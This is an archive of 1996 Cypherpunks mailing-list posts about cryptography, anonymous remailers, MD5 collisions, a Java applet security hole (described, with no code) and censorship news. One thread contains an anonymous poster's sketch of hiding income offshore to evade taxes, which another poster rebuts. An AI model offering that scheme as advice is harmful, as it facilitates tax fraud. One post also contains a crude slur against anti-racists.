For anyone who was interested in Dave's and my hardware project
(Architectural considerations for cryptanalytic hardware), it's done
(thank goodness).  You're free to check it out at

http://www.cs.berkeley.edu/~iang/isaac/hardware/

in either HTML or PostScript.  Thanks to cypherpunks Eric Hughes and
Bruce Koball, and to Altera people Clive McCarthy and Stephen Smith.

   - Ian "...pray for an 'A' for us..."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZE64UZRiTErSPb1AQHczwP+IF47Zg4VpecVFj+ei0AAr2h9ZVTV01nb
lsUXAwWpKla2LJ+sJGrSQmpu0Sd/wkIIGeTWnbCLiR+d4pdbKN2nwfHp6evjzEnw
luWWeuCFq51L0AViBGyu2r11IiAPGGIXWclb8dqqjL1YLtnJ/CCXXRbSGbJ7YdqO
6GBAMv13IgA=
=5IGV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 9 May 1996 15:07:06 +0800
To: cypherpunks@toad.com
Subject: MD5 weaknesses
Message-ID: <199605090034.RAA27901@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger posted a note to coderpunks about
>A paper by Hans Dobbertin dated May 2 in private circulation has found
>an easy method for generating collisions (not pseudocollisions as was
>done in previous work) in the MD5 compression function. I was told
>that this was public information.

And somebody provided a URL to 
http://www.cs.ucsd.edu/users/bsy/dobbertin.ps

The coderpunks discussion has been titled Re: Favorate flavor of hash? 
for which I suppose there are alternative interpretations :-)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Thu, 9 May 1996 13:20:49 +0800
To: cypherpunks@toad.com
Subject: Re: remailer@utopia.hacktic.nl down
In-Reply-To: <199605082121.XAA24292@basement.replay.com>
Message-ID: <319121CB.135D@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex de Joode wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----

> Due to recent events the Hacktic Foundation has decided to
> discontinue its remailing operations, the remailer that is
> operated by the Hacktic Foundation will cease to exist May
> 20th.

Co$, I'll wager.  Just shows to go ya.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Thu, 9 May 1996 17:56:02 +0800
To: cypherpunks@toad.com
Subject: DigiCash agreement with Deutsche Bank
Message-ID: <v02140b04adb6f8c2b65b@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


According to an article in a Swedish newspaper, Svenska Dagbladet
(http://www.svd.se/svd/ettan/ettan.html), DigiCash has closed an
agreement with Germany's largest bank, Deutsche Bank, that will
permit commerce on the Internet using digital cash.

The system will be tested first internally within Deutsche Bank to
check the security of the system, followed by a limited rollout
this autumn, with major distribution expected early next year. A customer
of the bank can "click on the DigiCash icon and confirm the amount of
German Marks required. The digital money is automatically downloaded
to the customer's computer and stored on disk in various amounts."

To purchase something from a homepage, the customer's computer sends
"digital cash" to the seller. The seller confirms via the bank within
two seconds that payment was made.

Translated (quickly) and summarized by

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 9 May 1996 13:50:54 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Mandatory Voluntary Self-Ratings
In-Reply-To: <adb61de708021004cef3@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960508183436.1088D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The  one I like is the FCC regulation which makes it mandatory for radio 
stations to preface their EBS test with the phrase, "This station, in 
VOLUNTARY compliance with...."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 9 May 1996 14:12:25 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <199605080632.IAA24692@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.93.960508185124.29348B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 May 1996, Anonymous wrote:

> Black Unicorn wrote:
> >Where does the company get the funds to pay you?
> 
> From Tim's day work. It's a consulting company, i.e. it sells his
> services to whomever is employing him today. The whole idea
> was to hide Tim's income sources, or that's what he asked for anyway.

Uh, so the whole of this plan relies on.

1)  The secrecy of the company.
2)  The secrecy of every 'employee' in the country
3)  Mr. May's ability to conceal his domestic spending.

> You can hide your income by putting it in another jurisdiction.

Do you understand how naive this sounds?  Do you understand the extent to
which you are over simplifying the situation?
 
> >What pay?  I don't get it.  Where does this friend gets his money?
> 
> As a cut from the money Tim's employer gives him.

The plot thickens.
Do you know that there is imposed on U.S. citizens (corporations included)
a withholding tax for payments to foreign entities subject to U.S.
taxation?

In this case the people paying the offshore company for Mr. May's services
are also subject to reporting requirements and a 30% withholding tax for
which they will be held liable.

This adds the requirement that the individuals or corporations receiving
Mr. May's service be involved in this conspiracy.  If they could have
been, why do you need the offshore connection?  Why not just conspire with
them to pay Mr. May in cash and not report it?

> >> By the way, are there any PGP encrypted mailing lists for
> >> discussing serious tax fraud?
> >
> >If such a list existed, would we tell an anonymous poster/fed?
> 
> >If your above scheme is intended merely to conceal funds it is a fairly
> >poor example as it depends on the secrecy of each and every 'employee' of
> >the company.
> 
> No it doesn't. One person knows where they money went when it left the
> country (and he is getting paid for the risk of doing time). Nobody knows
> where the funds are concealed. Probably in a trust that you can access
> when you are on vacation abroad.

Puhlease.

Continue your participation in such a plan.  I will send you cigs.

> Mr.X.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Thu, 9 May 1996 18:14:26 +0800
To: cypherpunks@toad.com
Subject: Re: hacktic.nl is down!!
In-Reply-To: <2.2.32.19960509002810.006bdb58@tiac.net>
Message-ID: <199605090206.TAA21691@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I just heard on IRC channel #scientology from Karen Spaink that hacktic.nl
> will be down as of 5/20 because of pressure from Scientology.
> 
> I don't have any more details yet.

Also the spam from anti-racist assholes in alt.politics.white-power.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chad Owen Yoshikawa <chad@CS.Berkeley.EDU>
Date: Thu, 9 May 1996 18:52:17 +0800
To: www-security@ns2.rutgers.edu
Subject: Java Hole: Web Graffiti & Covert Channels
Message-ID: <199605090210.TAA00650@whenever.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text


--------------------------------------------------------
Web Graffiti & High Bandwidth Covert Channels Using Java
--------------------------------------------------------

While developing a chat server using Java as a frontend, we've
been exploiting what we think is a new Java security hole in
Java-enabled browsers such as Netscape.  The hole allows for
opening sockets to arbitrary ports on web servers that serve
Trojan-horse applets.

We've also used a known security hole (covert channels) first mentioned
in work by the SIP group at Princeton to create what we call
'Web Graffiti' - the dynamic insertion of text, graphics, applets, into 
HTML pages.  

Both of these attacks are three-party attacks and require Trojan-
horse applets.  For a draft of a paper that is work in progress, 
point your browser to:

http://whenever.CS.Berkeley.EDU/graffiti/

Chad Yoshikawa		Brent Chun
chad@cs.berkeley.edu	bnc@cs.berkeley.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Thu, 9 May 1996 17:46:36 +0800
To: cypherpunks@toad.com
Subject: Re: remailer@utopia.hacktic.nl down
In-Reply-To: <319121CB.135D@vail.tivoli.com>
Message-ID: <199605090211.TAA22230@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Alex de Joode wrote:
> > 
> > -----BEGIN PGP SIGNED MESSAGE-----
> 
> > Due to recent events the Hacktic Foundation has decided to
> > discontinue its remailing operations, the remailer that is
> > operated by the Hacktic Foundation will cease to exist May
> > 20th.
> 
> Co$, I'll wager.  Just shows to go ya.

Perhaps Co$ was behind the recent spamming of
alt.politics.white-power.  Scientology is 
virulently anti-racist.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@acm.org>
Date: Thu, 9 May 1996 15:52:48 +0800
To: coderpunks@toad.com
Subject: ENIGMA
Message-ID: <v03006601adb6da86276a@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/plain


>From: danmec@inet.uni-c.dk
>Date: Wed, 08 May 1996 13:05:24 +0200
>Subject: ENIGMA
>To: cme@ACM.ORG
>
>X-Personal_name: Rag
>
>You may be interested in knowing that a 4 rotor U-boot ENIGMA is up for sale
>at Sotheby's in London 30th May.
>


+--------------------------------------------------------------------------+
| Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme           |
| PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 |
|   "Officer, officer, arrest that man!  He's whistling a dirty song."     |
+---------------------------------------------- Jean Ellison (aka Mother) -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Seth I. Rich" <seth@hygnet.com>
Date: Thu, 9 May 1996 14:47:26 +0800
To: blancw@microsoft.com (Blanc Weber)
Subject: Re: self-ratings vs. market ratings
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-960508194708Z-15104@tide21.microsoft.com>
Message-ID: <199605082343.TAA11006@arkady.hygnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> In consideration of the difference between "ratings" and "reputation":
> 
> I think of a rating as something which is attached to something
> "pre-knowledge", whereas a reputation is something which develops over
> time & based upon informed knowledge ("after-knowledge").

Perhaps a `rating' is discrete, applied to a specific instance (a web
page, a graphic image, a film), while a `reputation' could crudely be
compiled by summing one's ratings?  (I know this is very flawed, but it
could be a starting point for perspective.)

Seth
---------------------------------------------------------------------------
Seth I. Rich - seth@hygnet.com            "Info-Puritan elitist crapola!!"
Systems Administrator / Webmaster, HYGNet             (pbeilard@direct.ca)
Rabbits on walls, no problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 9 May 1996 14:58:30 +0800
To: sameer@c2.org>
Subject: Re: IP network #s in france
In-Reply-To: <199605082309.QAA15108@infinity.c2.org>
Message-ID: <AlYHCAC00YUwR1cK8U@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 8-May-96 IP network #s in france by
sameer@c2.org 
>         Anyone have a list of all the ip network #s in France? It
> would be most appreciated.

Yeah, check out the thread on fight-censorship
(http://fight-censorship.dementia.org/top/) about how the French
paramilitary police arrested two local ISP-businessmen 'cuz their news
spools had alt.sex.pedophilia and whatnot.

I spoke with someone from the French embassy today about this. They say
it was in the course of a child porn investigation. More to come later.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Thu, 9 May 1996 17:32:42 +0800
To: cypherpunks@toad.com
Subject: [off-topic] *.alias.net disappeared?
Message-ID: <199605090041.TAA11044@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm sorry for posting this to the list, but I've
no other apparent way of getting in touch with
these parties.

The alias.alias.net and nym.alias.net servers
have disappeared; in fact, nothing in *.alias.net
is still in any DNS that I can find.

Have these sites disappeared, or am I just in
a very bad corner of the 'net?

dave

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMZFB9TVTwUKWHSsJAQHfigf9F52pD+b+bUzK9GYVh4LgP988wG1e7VIp
rF9ouG2AOw+ipLQliv/cbgS9DiOg3/8IIvIZnfhZo8M1oFJ0LaaOh3BH0rsMh0RP
elkFtoAaGojcP04x/LvRm/S+NaZRfK+iIoFRxiI50rCYgXcQR9OmqwdtQ9I92k7L
jlASFwAWAJqdE6uhGxgMOAoPcLP5R+qBB83BsJguAnMBGmrPco8zfMtaRFhdjn74
xS8DXSjfqktPGZRnyqH/mddV1P2dLpPFEMS+V79ZrcARQ9IEQzb0zWSx5ET+wza+
x8cnRhBUhkybmLM+H54YSEDlv0asWWJNBUev1sb64PV3VMMhyJAwjg==
=kZSL
-----END PGP SIGNATURE-----
--- David Smith, Box 324, Cape Girardeau MO USA 63702
http://www.prairienet.org/~dsmith        des@juno.com
Reality is only for those lacking in true imagination




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Thu, 9 May 1996 15:26:56 +0800
To: cypherpunks@toad.com
Subject: hacktic.nl is down!!
Message-ID: <2.2.32.19960509002810.006bdb58@tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


I just heard on IRC channel #scientology from Karen Spaink that hacktic.nl
will be down as of 5/20 because of pressure from Scientology.

I don't have any more details yet.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Thu, 9 May 1996 20:09:50 +0800
To: cypherpunks@toad.com
Subject: Re: [off-topic] *.alias.net disappeared?
Message-ID: <adb71d5d03021004d518@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


John Perry (perry@jpunix.com) was running the alias.net services. Because
of work commitments, he was not able to continue to run alias.net

        -Lance

At 6:53 PM 5/8/96, David E. Smith wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I'm sorry for posting this to the list, but I've
>no other apparent way of getting in touch with
>these parties.
>
>The alias.alias.net and nym.alias.net servers
>have disappeared; in fact, nothing in *.alias.net
>is still in any DNS that I can find.
>
>Have these sites disappeared, or am I just in
>a very bad corner of the 'net?
>
>dave
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQEVAwUBMZFB9TVTwUKWHSsJAQHfigf9F52pD+b+bUzK9GYVh4LgP988wG1e7VIp
>rF9ouG2AOw+ipLQliv/cbgS9DiOg3/8IIvIZnfhZo8M1oFJ0LaaOh3BH0rsMh0RP
>elkFtoAaGojcP04x/LvRm/S+NaZRfK+iIoFRxiI50rCYgXcQR9OmqwdtQ9I92k7L
>jlASFwAWAJqdE6uhGxgMOAoPcLP5R+qBB83BsJguAnMBGmrPco8zfMtaRFhdjn74
>xS8DXSjfqktPGZRnyqH/mddV1P2dLpPFEMS+V79ZrcARQ9IEQzb0zWSx5ET+wza+
>x8cnRhBUhkybmLM+H54YSEDlv0asWWJNBUev1sb64PV3VMMhyJAwjg==
>=kZSL
>-----END PGP SIGNATURE-----
>--- David Smith, Box 324, Cape Girardeau MO USA 63702
>http://www.prairienet.org/~dsmith        des@juno.com
>Reality is only for those lacking in true imagination

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 9 May 1996 16:58:23 +0800
To: cypherpunks@toad.com
Subject: Internet/Obscenity Legal Gathering in NYC
Message-ID: <aDZmND88w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I haven't seen this announcement reposted to this mailing list, and I think
it's of sufficient interest to warrant reposting:

Newsgroups: misc.legal,alt.censorship,misc.legal.moderated,talk.politics,alt.privacy
From: ra@panix.com (Ron Abramson)
Subject: Free program on net censorship in NYC
Message-ID: <Dr1vDJ.Cr8@world.std.com>
Date: Mon, 6 May 1996 17:49:08 GMT

Announcement: Free Program On Net Censorship
in New York City, May 22 at 7:30 P.M.
--------------------------------------------

THE FIRST AMENDMENT IN CYBERSPACE:  Regulating the On-Line
Dissemination of "Indecent Material"

This program will address the issue of the First Amendment as
applied to the Internet and On-line services.  Special focus
will be given to the new federal law which is intended to
regulate the dissemination of "Indecent Material" via these
mediums.

The Association of the Bar of the City of New York
42 W 44TH Street, New York, New York (Bet. 5th and 6th Avenues)
(212) 382-6600

Wednesday, May 22, 1996, 7:30 till 9 P.M.

Moderator:
CHARLES R. NESSON
Weld Professor of Law, Harvard law School

Panelists:
ROBERT FLORES
Senior Trial Attorney, Child Exploitation and Obscenity
Section, U.S. Department of Justice

MICHAEL GODWIN
General Counsel, Electronic Frontier Foundation

STEPHEN M. HEATON
General Counsel, Compuserve, Inc.

NORMAN REDLICH
Wachtell, Lipton Rosen & Katz, former Dean,
New York University School of Law

BRUCE TAYLOR
President and Chief Counsel, National Center for
Children and Families

Co-sponsored by:
Committee on Computer Law, Joseph P. Zammit, Chair
Committee on Lectures and Continuing Education,
  Normal L. Green, Chair

Members of the Association, their guests and all other
interested persons are invited to attend.

No fees or reservations are required.


---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Eden <erice@internic.net>
Date: Thu, 9 May 1996 16:15:26 +0800
To: warlord@MIT.EDU (Derek Atkins)
Subject: Re: Senator Leahy's Public Key
In-Reply-To: <9605081459.AA20668@bart-savagewood.MIT.EDU>
Message-ID: <199605090116.VAA25790@ops.internic.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> This is exactly what the web of trust is about.  The fact is that you
> can't trust the Keyservers (they were never designed to be trusted);
> you can't trust .plan files; you can't trust index.html files.
> However you can trust signatures made by trusted keys.  That is why
> the web of trust works.
 
> For example, I've met in person with a lot of people and we've signed
> each others' keys.  We've used various methods to "prove" identity.
> Sometimes it's been a long time of personal interactions (close
> friends).  Sometimes it's been a number of certifying documents, IDs,
> etc.  Sometimes it's been a piece of knowledge that I know the other
> has but no one else has.
 
What if you needed to set up a key server for a mass base of customers...
Obviously, authenticating them via e-mail would be difficult, verifying 
them in person would be harder.  Would there be any reasonable way to 
verify hundreds or thousands of customers?  Any manual method would 
be highly undesirable, right?  Imagine the labor involved....but lets 
pretend that the labor is not the deciding factor.  What would be the 
best way to verify the customers keys if you couldn't visit each 
customer in person? 

For example, would a photo copy of a drivers license be enough?

> The point is that once I'm attached to the web of trust I have a means
> to verify other keys.  I can set up a CA that way (MIT has one) --
> there is a keysigner that will use out-of-band means to verify the
> identity of a user and then use that to sign a PGP key in that
> person's name.

This is a good idea.  The obvious question is:

Would using an "out-of-band means" be worth the time and trouble if 
you had to scale the project to a commercial level?  Would it  
be a show stopper if the keys weren't verified?

> As I said already, the keyservers are not bulletproof.  In fact, they
> were never designed to be trusted.  They were designed to be an
> untrusted key distribution system.  The end-user is still supposed to
> verify the signatures on they keys received from the keyserver.
 
Last thought...if the end-user verifies the signature, is that enough
protection?

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 9 May 1996 16:12:49 +0800
To: cypherpunks@toad.com
Subject: Penet-style web remailer?
Message-ID: <01I4H71YTSLW8Y5AFU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	As a result of scanning through the Nando Times'
(http://www.nando.net/nt/) Infotech section, I came across a piece on email
with the following address: http://noah.pair.com/anon.html. It appears to be
sort of a penet-style anonymous remailer, only without return messages. Anyone
know anything else about it? Of course, given the number of web interfaces to
fully anonymous remailers, I wouldn't encourage anyone to use it.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rodger@interramp.com (Will Rodger)
Date: Thu, 9 May 1996 17:00:28 +0800
To: cypherpunks@toad.com
Subject: FBI, DoJ deny invesitgation of CompuServe
Message-ID: <v01510100adb6c2a09e09@[38.12.91.214]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

on 5-8, Joseph Reagle  posted:

>        COLUMBUS, Ohio, May 8 (UPI) -- The FBI, acting on a complaint from
a
>Christian morals watchdog group, Wednesday sought to determine whether
>CompuServe Inc. has violated a new law against indecency.
>        FBI agents said they were attempting to determine whether
>CompuServe's Entertainment Drive, which contains some adult material,
>violates the Communications Decency Act. The law prohibits offering
>pornography to on-line users, especially minors.
>

Reuters, however, just moved a story saying the FBI and Dept. of Justice
denied there was *any* investigation ongoing. The agencies were responding
to the original stroy which ran in the Columbus Dispatch,

Such denials are *extremely* rare; agenices almost always refuse to confirm
or deny investigations. Those of you with access to AOL can check the story
out in technology news.

Will Rodger
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMZEUDEcByjT5n+LZAQFt0gf+MnIkM51VD9wlVwNG6KFTZGeYsJMFVViZ
5uRA6na7R9jNSL9u4zxJjYJxPkEDUO64z87ZV2tODXTOJdFfencOycCsy+oDR0da
1fObsFCqZN1Rh2ZNspgG4TpTLZVUn/naiZoA4jyFlRyXV8qa19Zwro5S0a9JfHj9
xofxhBwCb/Sdw4kKDRgqfnehrKVlIRaQw3kR9TetF+Olm2czF2iIoeQTlwUR7y10
SY+vqxApyACLTkwfPP/Y/H/uwMFTQbcMPCbI7yoK/AnPRywC0pV//b6JkSaMvcm3
ZhdyiUkpY6gRr0MAB4fwe2ho/zRLXj7bEQ2pSQJcRSpm2Tl+Zq4U9w==
=ffRy
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Thu, 9 May 1996 20:34:01 +0800
To: loki@infonex.com (Lance Cottrell)
Subject: Re: [off-topic] *.alias.net disappeared?
In-Reply-To: <adb71d5d03021004d518@[206.170.115.3]>
Message-ID: <199605090443.VAA09257@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


alias.net is alive and well. It is being hosted at NS.C2.ORG.

>From whois:
   Domain servers in listed order:

   NS.C2.ORG                    140.174.185.10
   ULTIMA.ORG                   140.174.184.10
   PANGAEA.ANG.ECAFE.ORG        194.129.42.2
   NS2.INFONEX.NET              206.170.114.3



> John Perry (perry@jpunix.com) was running the alias.net services. Because
> of work commitments, he was not able to continue to run alias.net
> 
>         -Lance
> 
> At 6:53 PM 5/8/96, David E. Smith wrote:
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >I'm sorry for posting this to the list, but I've
> >no other apparent way of getting in touch with
> >these parties.
> >
> >The alias.alias.net and nym.alias.net servers
> >have disappeared; in fact, nothing in *.alias.net
> >is still in any DNS that I can find.
> >
> >Have these sites disappeared, or am I just in
> >a very bad corner of the 'net?
> >
> >dave
> >
> >-----BEGIN PGP SIGNATURE-----
> >Version: 2.6.2
> >
> >iQEVAwUBMZFB9TVTwUKWHSsJAQHfigf9F52pD+b+bUzK9GYVh4LgP988wG1e7VIp
> >rF9ouG2AOw+ipLQliv/cbgS9DiOg3/8IIvIZnfhZo8M1oFJ0LaaOh3BH0rsMh0RP
> >elkFtoAaGojcP04x/LvRm/S+NaZRfK+iIoFRxiI50rCYgXcQR9OmqwdtQ9I92k7L
> >jlASFwAWAJqdE6uhGxgMOAoPcLP5R+qBB83BsJguAnMBGmrPco8zfMtaRFhdjn74
> >xS8DXSjfqktPGZRnyqH/mddV1P2dLpPFEMS+V79ZrcARQ9IEQzb0zWSx5ET+wza+
> >x8cnRhBUhkybmLM+H54YSEDlv0asWWJNBUev1sb64PV3VMMhyJAwjg==
> >=kZSL
> >-----END PGP SIGNATURE-----
> >--- David Smith, Box 324, Cape Girardeau MO USA 63702
> >http://www.prairienet.org/~dsmith        des@juno.com
> >Reality is only for those lacking in true imagination
> 
> ----------------------------------------------------------
> Lance Cottrell   loki@obscura.com
> PGP 2.6 key available by finger or server.
> Mixmaster, the next generation remailer, is now available!
> http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com
> 
> "Love is a snowmobile racing across the tundra.  Suddenly
> it flips over, pinning you underneath.  At night the ice
> weasels come."
>                         --Nietzsche
> ----------------------------------------------------------
> 
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 9 May 1996 17:00:53 +0800
To: adam@lighthouse.homeport.org
Subject: Re: Remailer in a box
Message-ID: <01I4H8DYPYFS8Y5AFU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Questions. How much memory does the Mixmaster remailer take up? What
accesses/permissions/etcetera on a machine do I need to have in order to have
it running on an account? Has anyone set up one such that it will only remail
from & to a set of addresses (e.g., other remailers)? I, for instance, wouldn't
be willing to deal with the hassles involved with running a remailer that was
either what the end user would see (thus getting potentially deluged with help
questions) or the end mailer (thus getting potentially in problems if someone
abuses the remailer)... but I (and others) might if it was set up just for
chaining. (Yes, I know I'd need a UNIX account... I'm looking into that.)
	Speaking of UNIX, does anyone have any existing programs to
automatically mail out at random intervals a looping or /dev/null directed
message through the remailers, in order to increase security against traffic
analysis? 
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Thu, 9 May 1996 21:13:41 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Remailer in a box
Message-ID: <adb729b707021004bc66@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:55 PM 5/8/96, E. ALLEN SMITH wrote:
>        Questions. How much memory does the Mixmaster remailer take up?

My remailer (with source code and spooled messages) is 1.4M.

>What
>accesses/permissions/etcetera on a machine do I need to have in order to have
>it running on an account?

It will run out of any account. A procmail script could be used to direct
the mail to Mixmaster (or the front end scripts). If you use the account
for other things, you can have the procmail script only forward the
Mixmaster messages.

>Has anyone set up one such that it will only remail
>from & to a set of addresses (e.g., other remailers)? I, for instance, wouldn't
>be willing to deal with the hassles involved with running a remailer that was
>either what the end user would see (thus getting potentially deluged with help
>questions) or the end mailer (thus getting potentially in problems if someone
>abuses the remailer)... but I (and others) might if it was set up just for
>chaining. (Yes, I know I'd need a UNIX account... I'm looking into that.)

This could be done with a trivial modification to the source and
destination blocking lists (just change the sense of the checking).
Cyberpass (www.cyberpass.net) offers UNIX accounts without dialin access
for $7 per month. These are available anonymously, and can be paid for with
ecash.

>        Speaking of UNIX, does anyone have any existing programs to
>automatically mail out at random intervals a looping or /dev/null directed
>message through the remailers, in order to increase security against traffic
>analysis?
>        Thanks,
>        -Allen

Yes, but I only give it to remailer operators. The "bramble" might get
flooded otherwise. Operators see the repercussions of their actions.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 9 May 1996 13:11:32 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605082014.WAA06482@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain



                       CRYPTOGRAPHIC EXTENSIONS FOR JAVA
                                       
   
     _________________________________________________________________
   
                                  DESCRIPTION
                                       
   This library contains a suite of cryptographic classes for Java. All
   of the classes have been implemented in native code for performance
   reasons, and have been tested on Windows 95, Windows NT and Solaris.

   Download in source or binary form at http://www.systemics.com/software/

   
                                   FEATURES
                                       
   All of the following have been implemented using native methods:
     * BigInteger class (based on code from Eric Young).
       This class implements arbitrary length integers and some
       associated mathematical functions.
     * DES class (based on code from Eric Young)
     * IDEA class
     * MD5 class (based on code from RSA Data Security, Inc.)
     * SHA class (based on code from NIST and Peter C. Gutmann)

       
                                   COPYRIGHT
                                       
   This library includes (or is derived from) software developed by (and
   owned by) the following:
     * Peter C. Gutmann
     * NIST
     * RSA Data Security, Inc.
     * Systemics Ltd <http://www.systemics.com/>
     * Eric Young <eay@mincom.oz.au>
       
   

   Also planned for release:

     * Cryptographic library for Java
     * PGP library for Java
     * Cryptographic library for Perl
     * PGP library for Perl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: watson@tds.com
Date: Thu, 9 May 1996 18:52:36 +0800
To: cypherpunks@toad.com
Subject: re: Dempster-Shafer...(re: Transitive
Message-ID: <Pine.SOL.3.91.960508221153.24982B-100000@mailman.tds.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay's approach is elegant, and it's refreshing to find a practical use 
for AI approaches.  I think it needs one more step, though.  If we learn 
to quantify our trust in a key, we still need to know what the threshold 
should be for a given application.  Maybe I can get by with a 0.05 Bel 
for posting to cypherpunks, but maybe I want a 0.95 for a monetary 
transaction.  Seems to need a comprehensive risk management approach,




